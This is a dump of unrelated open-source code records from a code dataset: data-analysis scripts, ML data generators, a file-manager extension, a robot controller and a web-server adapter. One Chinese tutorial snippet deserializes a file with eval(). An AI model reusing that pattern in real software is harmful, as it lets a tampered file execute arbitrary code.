2 + cos(lat1) * cos(lat2) * sin(dlon / 2.0) ** 2\n c = 2 * asin(sqrt(a))\n raio_da_terra_em_metros = 6371000\n return c * raio_da_terra_em_metros\n\n\ndef ler_tabela_de_csv(nome_ficheiro_csv):\n \"\"\"\n Requires: o nome de um ficheiro CSV com cabeçalho na primeira linha.\n Ensures: retorna uma tabela no formato de lista de dicionários.\n \"\"\"\n with open(nome_ficheiro_csv, 'rU') as ficheiro_csv:\n leitor = csv.DictReader(ficheiro_csv, delimiter=',')\n return [linha for linha in leitor]\n\n\n### Verificando o tempo que leva a construir os dados dos gráficos\n\nfrom timeit import timeit\n\n# Uma string representando o nome do ficheiro CSV contendo os dados de\n# interesse para o trabalho. Coloquem aqui o nome do vosso ficheiro.\nficheiro_dados_crimes = None\n\ndef go_time():\n \"\"\"Ensures: Devolve o tempo de execução da função dados_crimes()\n quando aplicada ao ficheiro ficheiro_dados_crimes.\n \"\"\"\n return timeit(\"dados_crimes(ficheiro_dados_crimes)\",\n \"from projeto import dados_crimes\", number = 1)\n\ndef dados_crimes(nome_ficheiro):\n \"\"\"Esta função não deve levar mais do que um determinado tempo\n quando executada numa máquina do laboratório do Departamento de\n Informática. O tempo em questão será anunciado na semana 9 de maio\n de 2016.\n\n Requires: nome_ficheiro é uma string representando o nome de um\n ficheiro CSV com dados sobre crimes.\n \n Ensures: Devolve um quadrúplo com os dados referentes a cada um dos\n quatro gráficos, de acordo com o enunciado do projeto.\n \"\"\"\n t = ler_tabela_de_csv(nome_ficheiro)\n return crimes_por_data(t), crimes_por_hora(t), \\\n crimes_por_tipo(t), crimes_por_distancia(t)\n\n##if __name__ == \"__main__\":\n## #tabela= ler_tabela_de_csv('teste.csv')\n## #grafico = crimes_por_tipo(tabela)\n## #traca_crimes_por_tipo(grafico)\n## #print(crimes_por_hora(ler_tabela_de_csv('teste.csv')))\n## #tabela= ler_tabela_de_csv('teste.csv')\n## #grafico = crimes_por_hora(tabela)\n## #traca_crimes_por_hora(grafico)\n","sub_path":"Projeto/projeto.py","file_name":"projeto.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445461541","text":"\"\"\"\n task4_1.py - school listing test file\n\n This file is a continuation of the previous exercise (task3_1.py).\n\n In this part of the exercise, the driver will communicate with a new module. This\n module contains an XMLRPC client. The XMLRPC client remotely communicates\n with the XMLRPC server.\n\n Note: for imports to work properly, your student_files folder should be on your\n PYTHONPATH.\n\n Also, remember to run server.py before running this client.\n\"\"\"\nimport ch04_network_prog.solution.client as client\n\n\nif __name__ == '__main__':\n school_name = input('Enter partial school name: ')\n results = client.get_schools(school_name)\n for cnt, school in enumerate(results, 1):\n print('{0:<5}{fullname} ({city}, {state})'.format(cnt, **school))\n","sub_path":"Optum Tech/IN1468 available until 12-31-20/IN1468_student_files/student_files/ch04_network_prog/solution/task4_1.py","file_name":"task4_1.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"104689549","text":"#!/usr/bin/env pythony\n#_*_coding:utf-8_*_\n#__author__ = pcjboy\n# Date 18.5.18\n\n#把内存数据 转成字符,叫序列化\n# data = {\n#\n# 'roles':[\n# {'role':'monster','type':'pig','life':50},\n# {'role':'hero','type':'关习','life':80},\n# ]\n# }\n# f = open(\"game_status\", 'w')\n# f.write(str(data))\n\n#把字符数据转到内在数据, 叫反序列化\nf = open(\"game_status\",\"r\")\nd = f.read()\nd = eval(d)\nprint(d['roles'])\n\n","sub_path":"chapter4-常用模块/序列化.py","file_name":"序列化.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133084202","text":"# Import the required module for text \n# to speech conversion \nfrom gtts import gTTS \n#from playsound import playsound as ps\n# This module is imported so that we can \n# play the converted audio \nimport os \nimport pygame\n# The text that you want to convert to audio\ndef play_audio(mytext):\n\n # Language in which you want to convert \n language = 'en'\n\n # Passing the text and language to the engine, \n # here we have marked slow=False. Which tells \n # the module that the converted audio should \n # have a high speed\n \n myobj = gTTS(text=mytext, lang=language, slow=False) \n\n # Saving the converted audio in a mp3 file named \n # welcome \n myobj.save(\"welcome.mp3\")\n \n #ps('welcome.mp3')\n # Playing the converted file \n #os.system(\"mpg321 welcome.mp3\")\n pygame.mixer.init()\n pygame.mixer.music.load(\"welcome.mp3\")\n\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy() == True:\n continue\n \nplay_audio(\"This is the news\")\n\n\n\n","sub_path":"TextToSpeech/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208206316","text":"# coding=utf-8\nfrom decorator import new_thread\nfrom util import db_util\n\nquery = db_util.get_query()\n\n\n@new_thread\ndef syn1():\n query.Query(\"select * from ksexpt.ks_user\")\n\n for row in query.record:\n print(\"ks\", row['username'])\n\n query.call_proc(\"call ksexpt.proc_call_behavior()\")\n\n\n@new_thread\ndef syn2():\n query.Query(\"select * from ksexpt.ndb_user\")\n\n for row in query.record:\n print(\"ndb\", row['username'])\n\nif __name__ == '__main__':\n [x.join() for x in [syn1(), syn2()]]\n","sub_path":"action/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605097726","text":"import sympy\nimport numpy as np\nimport matplotlib.pyplot as py\nfrom matplotlib import animation\n\n# Module 3 graded assessment - Part 1\n\n# Calculating Constants\n# -----------------------------------------------------------------------------\n\nu_max, u_star, rho_max, rho_star, A, B = sympy.symbols('u_max u_star rho_max rho_star A B')\n\neq1 = sympy.Eq( 0, u_max*rho_max*(1 - A*rho_max-B*rho_max**2) )\neq2 = sympy.Eq( 0, u_max*(1 - 2*A*rho_star-3*B*rho_star**2) )\neq3 = sympy.Eq( u_star, u_max*(1 - A*rho_star - B*rho_star**2) )\neq4 = sympy.Eq(eq2.lhs - 3*eq3.lhs, eq2.rhs - 3*eq3.rhs)\n\nrho_sol = sympy.solve(eq4,rho_star)[0]\n\nB_sol = sympy.solve(eq1,B)[0]\n\nquadA = eq2.subs([(rho_star, rho_sol), (B,B_sol)])\n\nA_sol = sympy.solve(quadA, A)\n\naval = A_sol[0].evalf(subs={u_star:1.5, u_max:2.0, rho_max:15.0} )\nprint('A is {:.5f}'.format(aval))\n\nbval = B_sol.evalf(subs={rho_max:15.0, A:aval} )\nprint('B is {:.5f}'.format(bval))\n\n# Maximum Density Limit\n# -----------------------------------------------------------------------------\n\nrho_sol = sympy.solve(eq2, rho_star)[0]\nrho_val = rho_sol.evalf(subs = {u_max: 2.0, A: aval, B: bval} )\n\nprint('rho max is {:.2f}'.format(rho_val))\n","sub_path":"mod3-riding-wave/graded-1.py","file_name":"graded-1.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294433647","text":"\nimport streamlit as st\nfrom textblob import TextBlob\nfrom PIL import Image\ndef main():\n st.title(\"Sentiment Analysis\")\n img=Image.open(\"sentiment-analysis_1.jpg\")\n st.image(img)\n st.write(\"sentiment analysis\")\n text=st.text_input(\"Enter a sentence--\")\n if st.button(\"Analysis\"):\n br=TextBlob(text)\n result=br.sentiment.polarity\n if result==0:\n st.success(\"This is a Neutral Message\")\n elif result>0:\n st.success(\"This is a Positive Message\")\n else:\n st.success(\"This is a Negative Message\")\n \nif __name__==\"__main__\":\n main() \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191344368","text":"#pi的计算\nfrom math import sqrt\nfrom random import random\nfrom time import clock\nDATRS = 1200\nTips = 0\nclock()\nfor i in range(1,DATRS):\n x,y = random(),random()\n dist = sqrt(x ** 2 + y ** 2)\n if dist <= 1.0:\n Tips = Tips+1\npi = 4*(Tips/DATRS)\nprint(\"得到π的值为; %s\"%pi)\nprint(\"所用到的时间为:%-5.5ss\"%clock())","sub_path":"Python practice/计算PI值.py","file_name":"计算PI值.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442311929","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by Jack on 04/02/2018\n\n\"\"\"Data generators for translation data-sets.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tarfile\n\n# Dependency imports\n\nfrom tensor2tensor.data_generators import generator_utils\nfrom tensor2tensor.data_generators import problem\nfrom tensor2tensor.data_generators import text_encoder\nfrom tensor2tensor.data_generators import translate\nfrom tensor2tensor.utils import registry\n\nimport tensorflow as tf\n\nFLAGS = tf.flags.FLAGS\n\n# End-of-sentence marker.\nEOS = text_encoder.EOS_ID\n\n_ENDE_TRAIN_DATASETS = [\n [\n \"http://data.statmt.org/wmt17/translation-task/training-parallel-nc-v12.tgz\", # pylint: disable=line-too-long\n (\"training/news-commentary-v12.de-en.en\",\n \"training/news-commentary-v12.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.de-en.en\", \"commoncrawl.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.de-en.en\", \"training/europarl-v7.de-en.de\")\n ],\n]\n_ENDE_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt17/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.de\")\n ],\n]\n\n\ndef _get_wmt_ende_bpe_dataset(directory, filename):\n \"\"\"Extract the WMT en-de corpus `filename` to directory unless it's there.\"\"\"\n train_path = os.path.join(directory, filename)\n if not (tf.gfile.Exists(train_path + \".de\") and\n tf.gfile.Exists(train_path + \".en\")):\n url = (\"https://drive.google.com/uc?export=download&id=\"\n \"0B_bZck-ksdkpM25jRUN2X2UxMm8\")\n corpus_file = generator_utils.maybe_download_from_drive(\n directory, \"wmt16_en_de.tar.gz\", url)\n with tarfile.open(corpus_file, \"r:gz\") as corpus_tar:\n corpus_tar.extractall(directory)\n return train_path\n\n\n@registry.register_problem\nclass TranslateMnzhBpe32k(translate.TranslateProblem):\n \"\"\"Problem spec for WMT En-De translation, BPE version.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 32000\n\n @property\n def vocab_name(self):\n return \"vocab.bpe\"\n\n def source_vocab_name(self):\n return \"vocab.32k.mn.txt\"\n\n def target_vocab_name(self):\n return \"vocab.32k.zh.txt\"\n\n def feature_encoders(self, data_dir):\n source_vocab_filename = os.path.join(data_dir, self.source_vocab_name())\n target_vocab_filename = os.path.join(data_dir, self.target_vocab_name())\n source_encoder = text_encoder.TokenTextEncoder(source_vocab_filename, replace_oov=\"UNK\")\n target_encoder = text_encoder.TokenTextEncoder(target_vocab_filename, replace_oov=\"UNK\")\n return {\"inputs\": source_encoder, \"targets\": target_encoder}\n\n def generator(self, data_dir, tmp_dir, train):\n \"\"\"Instance of token generator for the mn->zh task, training set.\"\"\"\n dataset_path = (\"train.32k\"\n if train else \"valid.32k\")\n train_path = os.path.join(data_dir, dataset_path)\n\n source_token_path = os.path.join(data_dir, self.source_vocab_name())\n target_token_path = os.path.join(data_dir, self.target_vocab_name())\n for token_path in [source_token_path, target_token_path]:\n with tf.gfile.GFile(token_path, mode=\"r\") as f:\n vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\n with tf.gfile.GFile(token_path, mode=\"w\") as f:\n f.write(vocab_data)\n source_token_vocab = text_encoder.TokenTextEncoder(source_token_path, replace_oov=\"UNK\")\n target_token_vocab = text_encoder.TokenTextEncoder(source_token_path, replace_oov=\"UNK\")\n return translate.token_generator(train_path + \".mn\", train_path + \".zh\",\n source_token_vocab, target_token_vocab, EOS)\n\n @property\n def input_space_id(self):\n return problem.SpaceID.MN_BPE_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.ZH_BPE_TOK\n","sub_path":"tensor2tensor/data_generators/translate_mnzh_bpe32k.py","file_name":"translate_mnzh_bpe32k.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436120520","text":"\"\"\"\nThe MIT License\nCopyright (c) 2017 Thomas Kipf\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nModified from https://github.com/tkipf/gae to work with citation network data.\n\"\"\"\n\nimport numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nimport sys\nfrom collections import defaultdict as dd\n\nfrom graph.completion.longae.hparams import hparams\n\nnp.random.seed(1982)\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef sample_mask(idx, l):\n \"\"\"Create mask.\"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\ndef load_graph(file):\n graph = dd(list)\n with open(file, 'r') as f:\n for line in f:\n line = line.rstrip().split(\" \")\n graph[line[0]].append(line[1])\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)).toarray()\n return adj\n \ndef output_graph(graph):\n output = []\n for k, v in nx.to_dict_of_lists(nx.to_networkx_graph(graph)).items():\n for i in v:\n output.append((k, i))\n return output\n\ndef load_citation_data_from_file(files):\n \"\"\"Load citation data.\"\"\"\n with open(files[0], 'rb') as f:\n features = np.loadtxt(f)\n \n with open(files[1], 'rb') as f:\n labels = np.loadtxt(f)\n \n graph = dd(list)\n with open(files[2], 'r') as f:\n for line in f:\n line = line.rstrip().split(\" \")\n graph[line[0]].append(line[1])\n\n if hparams.index_file == \"\":\n l = len(features) // 5\n test_idx_range = np.arange(l)\n test_idx_reorder = np.random.permutation(test_idx_range)\n else:\n test_idx_reorder = parse_index_file(hparams.index_file)\n test_idx_range = np.sort(test_idx_reorder)\n\n features[test_idx_reorder, :] = features[test_idx_range, :]\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)).tolil()\n\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(hparams.training_size)\n idx_val = range(hparams.training_size, hparams.training_size + hparams.dev_size)\n\n train_mask = sample_mask(idx_train, labels.shape[0])\n val_mask = sample_mask(idx_val, labels.shape[0])\n test_mask = sample_mask(idx_test, labels.shape[0])\n\n y_train = np.zeros(labels.shape)\n y_val = np.zeros(labels.shape)\n y_test = np.zeros(labels.shape)\n y_train[train_mask, :] = labels[train_mask, :]\n y_val[val_mask, :] = labels[val_mask, :]\n y_test[test_mask, :] = labels[test_mask, :]\n \n return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask\n\ndef sparse_to_tuple(sparse_mx):\n if not sp.isspmatrix_coo(sparse_mx):\n sparse_mx = sparse_mx.tocoo()\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n\n\ndef split_citation_data(adj):\n \"\"\"\n Function to build test set with 10% positive links and\n the same number of randomly sampled negative links.\n NOTE: Splits are randomized and results might slightly deviate\n from reported numbers in the paper.\n \"\"\"\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / 10.))\n num_val = int(np.floor(edges.shape[0] / 20.))\n if num_test == 0:\n num_test = 1\n if num_val == 0:\n num_val = 1\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return (np.all(np.any(rows_close, axis=-1), axis=-1) and\n np.all(np.any(rows_close, axis=0), axis=0))\n\n test_edges_false = []\n while len(test_edges_false) < len(test_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], edges_all):\n continue\n if test_edges_false:\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\n continue\n test_edges_false.append([idx_i, idx_j])\n\n val_edges_false = []\n while len(val_edges_false) < len(val_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], train_edges):\n continue\n if ismember([idx_j, idx_i], train_edges):\n continue\n if ismember([idx_i, idx_j], val_edges):\n continue\n if ismember([idx_j, idx_i], val_edges):\n continue\n if val_edges_false:\n if ismember([idx_j, idx_i], np.array(val_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\n continue\n val_edges_false.append([idx_i, idx_j])\n\n data = np.ones(train_edges.shape[0])\n\n # NOTE: the edge list only contains single direction of edge!\n return np.concatenate([test_edges, np.asarray(test_edges_false)], axis=0)\n\n","sub_path":"graph/completion/longae/utils_gcn.py","file_name":"utils_gcn.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640452264","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nimport string\nfrom LabelControl import LabelControl\n\nclass ClassifierPaste(Report):\n\n def getClassifiers(self):\n lc = LabelControl.bring(self.tableName)\n if (lc):\n dims = lc.LabelTypes.split(\",\")\n labs = {}\n query = Query()\n query.sql = \"SELECT {Code}, {Name}, {Type} FROM [Label] \"\n if query.open():\n for rec in query:\n if (rec.Type in dims):\n if not labs.has_key(rec.Type):\n labs[rec.Type] = []\n labs[rec.Type].append( (rec.Code,rec.Name) )\n return labs\n return {}\n\n def select(self,param,value):\n dim,lab = param.split(\",\")\n self.values[dim] = lab\n self.clear()\n self.run()\n self.render()\n\n def setinitialValues(self):\n self.values = {}\n for lab in self.record.Classification.split(\",\"):\n for dim in self.classifiers.keys():\n labels = [ lb for (lb,labname) in self.classifiers[dim] ]\n if (lab in labels):\n self.values[dim] = lab\n continue\n #alert(self.values)\n\n def run(self):\n icons = [\"<IMG SRC=images/orange.png>\",\"<IMG SRC=images/nopriority.png>\"]\n self.getView().resize(400,400)\n if (not self.__dict__.has_key(\"values\")):\n from LabelType import LabelType\n self.labelTypes = LabelType.getNames()\n self.classifiers = self.getClassifiers()\n self.setinitialValues()\n initialvalues = self.record.Classification.split(\",\")\n self.printReportTitle(tr(\"Paste Classifier\"))\n\n c = \"White\"\n self.startTable()\n for dim in self.classifiers.keys():\n self.startRow()\n self.addValue(self.labelTypes[dim],Color=\"White\",BGColor=\"Gray\")\n for (lab,labname) in self.classifiers[dim]:\n bcol = \"#CC6600\"\n if self.values.get(dim,\"\") == lab:\n bcol = \"orange\"\n self.addValue(labname,CallMethod=\"select\",Color=c,BGColor=bcol,Parameter=\"%s,%s\" % (dim,lab) )\n self.endRow()\n self.row(\"\")\n self.endTable()\n\n self.startTable() \n self.startRow()\n self.addValue(tr(\"Paste\"),Bold=True,CallMethod=\"paste\")\n self.endRow()\n self.endTable()\n return\n\n def paste(self,value):\n self.record.Classification = \",\".join(self.values.values())\n self.close()\n","sub_path":"base/reports/ClassifierPaste.py","file_name":"ClassifierPaste.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341508543","text":"import sys\nprint(sys.version)\n\nprint(\"mecplugins_wikidpad_archiver_nautilus_nemo_extension.py\")\n\n# debug by running\n#\n# nautilus -q\n# nautilus --no-desktop\n#\n# or\n# nemo -q\n# nemo --no-desktop\n\n\nimport os\nimport time\nimport locale\nimport shutil\nimport datetime\n\nfrom urllib.parse import unquote_plus\nfrom urllib.parse import urlsplit\n\nimport gi\n\ntry:\n gi.require_version('Nemo', '3.0')\n print(\"gi.require_version('Nemo', '3.0')\")\nexcept ValueError:\n gi.require_version('Nautilus', '3.0')\n print(\"gi.require_version('Nautilus', '3.0')\")\n\nfrom gi.repository import GObject\n\ntry:\n from gi.repository import Nemo as Verne\n fm = \"Nemo\"\nexcept ImportError:\n from gi.repository import Nautilus as Verne\n fm = \"Nautilus\"\n\nprint(fm)\n\nlocale.setlocale(locale.LC_ALL, '')\n#locale.setlocale(locale.LC_ALL, \"pt_PT\")\n\nclass ColumnExtension(GObject.GObject, Verne.MenuProvider):\n\n def __init__(self):\n pass\n\n def get_file_items(self, window, files):\n item = Verne.MenuItem(name= f\"{fm}::wikidpad\",\n label= \"Save to WikidPad {}\".format(datetime.date.today()),\n tip= \"wikidpad\",\n icon= ''\n )\n item.connect('activate', self.menu_activate_cb, files)\n return item,\n\n def menu_activate_cb(self, menu, files):\n today = str(datetime.date.today())\n print(today)\n today_dir = os.path.join(\"/home/bjorn/files/\", today)\n print(today_dir)\n try:\n os.makedirs(today_dir)\n except OSError:\n pass\n\n links= \"\\n\"\n\n files = [f for f in files if not f.is_gone()]\n print()\n for file_ in files:\n uri = unquote_plus(file_.get_uri())\n print(uri)\n src = urlsplit(uri).path\n print(src)\n name = os.path.split(src)[-1]\n print(name)\n dst = os.path.join(today_dir, name)\n print(dst)\n shutil.move(src, dst)\n link = \"[file:{}]\\n\".format(dst)\n print(link)\n links+=link\n print()\n\n\n wikipage = os.path.join(\"/home/bjorn/Dropbox/wikidata/\", f\"{today}.md\") #<-- ugly!\n\n header = \"\"\n if not os.path.exists(wikipage):\n header = time.strftime(\"## %Y-%m-%d|%A %B %d|Week %W [alias: %d %B %Y] [now] [someday] [todo_todo]\\nhttps://calendar.google.com/calendar/r/week/%Y/%m/%d\\n\\n\\n\") #.encode() # locale.getlocale()[1]\n print(header)\n else:\n print(\"no header\")\n\n with open(wikipage, \"a\") as f:\n f.write(header)\n f.write(links)\n\n\n print( \"File size \", os.stat(wikipage)[6] )\n\n","sub_path":"scripts/mecplugins_wikidpad_archiver_nautilus_nemo_extension.py","file_name":"mecplugins_wikidpad_archiver_nautilus_nemo_extension.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172200978","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n#Reading File and Parsing\nfile = 'API_EN.ATM.CO2E.PC_DS2_en_excel_v2_9944766.xls'\ndata = pd.ExcelFile(file)\ndf1 = data.parse('Data', skiprows=3)\ndf1 = df1.drop([\"Country Code\", \"Indicator Name\", \"Indicator Code\"], axis=1)\ndf1 = df1.set_index(\"Country Name\")\ndf1 = df1.sort_values('2014', ascending=False)\n\n#print (df1.loc['India']['2014'])\ndf1.loc[[\"Qatar\", \"Kuwait\",\"Bahrain\",\"United Arab Emirates\",\"Saudi Arabia\",\"United States\",\"Australia\",\"Canada\",\"Russian Federation\",\"Singapore\",\"Netherlands\", \"Japan\",\"Norway\",\"Germany\", \"China\", \"United Kingdom\" ,\"France\",\"India\"], \"2014\"].plot(kind='bar')\n\n#Fromatting axis ticks\nplt.ticklabel_format(useOffset=False, style='plain', axis='y')\nplt.xticks(fontsize=8)\nplt.suptitle('CO2 emissions (metric tons per capita) 2014', fontsize=19)\n\n\nplt.show()\n","sub_path":"PerCapitaCO2Emission_2014_BarGraph.py","file_name":"PerCapitaCO2Emission_2014_BarGraph.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"596605002","text":"from ps4 import PS4Controller\nfrom Azubot import AzubotController\n\n\"\"\" This class puts all required control components together and\n starts polling for control events. These events can be sent\n by any correctly implemented controller. Actions received are\n then sent to the AzubotController.\n\"\"\"\nclass Application:\n # Catches actions requiring parameters to be passed.\n methodsWithParam = [ \"setLeftSpeedNorm\", \"setRightSpeedNorm\", \"setHeadAngleHorizontal\", \"setHeadAngleVertical\"]\n\n def __init__(self):\n # Initialize Azubot and Controller\n self.bot = AzubotController()\n #self.input = xboxController()\n self.input = PS4Controller()\n self.input.start()\n\n while True:\n # get actions from controller\n actions = self.input.getActions()\n for action in actions:\n if action is not None:\n # differentiate between actions with and without parameters\n if action in self.methodsWithParam:\n # run action\n result = getattr(self.bot, action)(actions[action])\n else:\n # run action\n result = getattr(self.bot, action)() \nif __name__ == \"__main__\":\n Application()\n","sub_path":"Control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594749087","text":"import json\nimport math\nimport numpy as np\nimport metadata\n\nbutterflies_by_image_id = {i.image_id: i for i in metadata.load()}\n\nstrings = []\nname_ids = {}\n\ndef get_name_id(value):\n if value not in name_ids:\n name_ids[value] = len(strings)\n strings.append(value)\n return name_ids[value]\n\ndef create_json_dict(item, x, y):\n result = {\n 'x': x,\n 'y': y,\n 'occId': item.occurence_id,\n 'image': item.image_id,\n 'properties': [get_name_id(p) for p in (item.family, item.genus, item.species, item.subspecies, item.sex, item.country, item.pretty_name)]\n }\n\n if item.latitude != '':\n result['lat'] = float(item.latitude)\n if item.longitude != '':\n result['lon'] = float(item.longitude)\n if item.pretty_time is not None:\n result['time'] = item.pretty_time\n\n return result\n\nDATAQUADS_PER_FILE = 16\n\nclass DataQuads():\n def __init__(self, depth):\n self.depth = depth\n self.quad_count = 2**(depth - 9)\n self.quads = {}\n\n def insert(self, item):\n x, y = item['x'], item['y']\n\n quad_x = math.floor(x * self.quad_count)\n quad_y = math.floor(y * self.quad_count)\n\n if quad_x not in self.quads:\n self.quads[quad_x] = {}\n if quad_y not in self.quads[quad_x]:\n self.quads[quad_x][quad_y] = []\n \n self.quads[quad_x][quad_y].append(item)\n\n def save(self):\n dataquad_files = {}\n for x in self.quads:\n file_x = x // DATAQUADS_PER_FILE\n for y in self.quads[x]:\n file_y = y // DATAQUADS_PER_FILE\n if (file_x, file_y) not in dataquad_files:\n dataquad_files[(file_x, file_y)] = {}\n dataquad_file = dataquad_files[(file_x, file_y)]\n if x not in dataquad_file:\n dataquad_file[x] = {}\n dataquad_file[x][y] = self.quads[x][y]\n for file_x, file_y in dataquad_files:\n json_string = json.dumps(dataquad_files[(file_x, file_y)])\n with open('data/meta/{:d}_{:d}_{:d}.json'.format(self.depth, file_x, file_y), 'w') as file:\n file.write(json_string)\n\ndata = json.load(open('data/clusters.json', 'r'))\n\nresult = {}\nfor depth_str in data:\n items = data[depth_str]\n depth = int(depth_str)\n quads = DataQuads(depth)\n \n for item in items:\n x, y, image_id = item['x'], -item['y'], item['image']\n\n if image_id not in butterflies_by_image_id:\n continue\n\n quads.insert(create_json_dict(butterflies_by_image_id[image_id], x, y))\n \n if depth < 13:\n result[depth] = quads.quads\n else:\n quads.save()\n\nfrom image_loader import ImageDataset\ndataset = ImageDataset()\ncodes = np.load('data/latent_codes_embedded_moved.npy')\n\nfinal_depth = max(int(d) for d in data.keys()) + 1\n\nfinal_depth_quads = DataQuads(final_depth)\n\nfor i in range(codes.shape[0]):\n x, y, image_id = codes[i, 0], -codes[i, 1], dataset.hashes[i]\n \n if image_id not in butterflies_by_image_id:\n continue\n\n final_depth_quads.insert(create_json_dict(butterflies_by_image_id[image_id], x, y))\n\nfinal_depth_quads.save()\n\nresult['names'] = strings\njson_string = json.dumps(result)\nwith open('data/meta.json', 'w') as file:\n file.write(json_string)\n","sub_path":"create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"24422587","text":"#!/usr/bin/env python3\n\nimport bottle\n\nbottle.BaseRequest.MEMFILE_MAX = 2**40\nclass Server(bottle.ServerAdapter):\n def run(self, handler): # pragma: no cover\n from cherrypy import wsgiserver\n self.options['bind_addr'] = (self.host, self.port)\n self.options['wsgi_app'] = handler\n\n certfile = self.options.get('certfile')\n if certfile:\n del self.options['certfile']\n keyfile = self.options.get('keyfile')\n if keyfile:\n del self.options['keyfile']\n\n server = wsgiserver.CherryPyWSGIServer(**self.options)\n if certfile:\n server.ssl_certificate = certfile\n if keyfile:\n server.ssl_private_key = keyfile\n server.max_request_body_size = 2**40\n server.max_request_header_size = 2**40\n server.request_queue_size = 1024\n\n try:\n server.start()\n finally:\n 